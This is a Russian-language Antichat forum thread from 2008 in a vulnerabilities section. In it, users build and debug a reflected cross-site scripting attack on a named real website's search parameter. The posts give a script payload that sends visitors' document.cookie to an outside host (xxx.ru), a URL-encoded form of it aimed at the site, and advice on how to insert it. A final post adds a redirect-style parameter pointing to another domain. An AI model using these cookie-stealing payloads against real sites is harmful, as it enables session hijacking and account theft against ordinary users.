ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 04.08.2008, 23:35
.nor
Познающий
Регистрация: 29.06.2007
Сообщений: 51
Провел на форуме:
1650734

Репутация: 14
По умолчанию

Исходный
Код:
"><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>
 

  #12  
Старый 04.08.2008, 23:47
popel
Новичок
Регистрация: 15.08.2007
Сообщений: 9
Провел на форуме:
246741

Репутация: 0
Отправить сообщение для popel с помощью ICQ
По умолчанию

http://www.blizko.ru/goodlist?q=%22%3E%3Cscript%3Eimg+%3D+new+Image%28% 29%3B+img.src+%3D+%22http%3A%2F%2Fxxx.ru%2Fs.gif%3 F%22%2Bdocument.cookie%3B%3C%2Fscript%3E
как расшифровывается???

заменяю alert('ggg') на "><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>

получаю нерабочий
http://www.blizko.ru/goodlist?q=1%22%3E%3Cscript%3E"><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>%3C/script%3E
 

  #13  
Старый 04.08.2008, 23:52
.nor
Познающий
Регистрация: 29.06.2007
Сообщений: 51
Провел на форуме:
1650734

Репутация: 14
По умолчанию

Цитата:
Сообщение от popel  
http://www.blizko.ru/goodlist?q=%22%3E%3Cscript%3Eimg+%3D+new+Image%28% 29%3B+img.src+%3D+%22http%3A%2F%2Fxxx.ru%2Fs.gif%3 F%22%2Bdocument.cookie%3B%3C%2Fscript%3E
как расшифровывается???
Код:
"><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>
заменять надо не alert('ggg'), а <script>alert('ggg')</script>
 

  #14  
Старый 05.08.2008, 01:56
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

&url=http://vital.h.com.ua ))))))))))
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ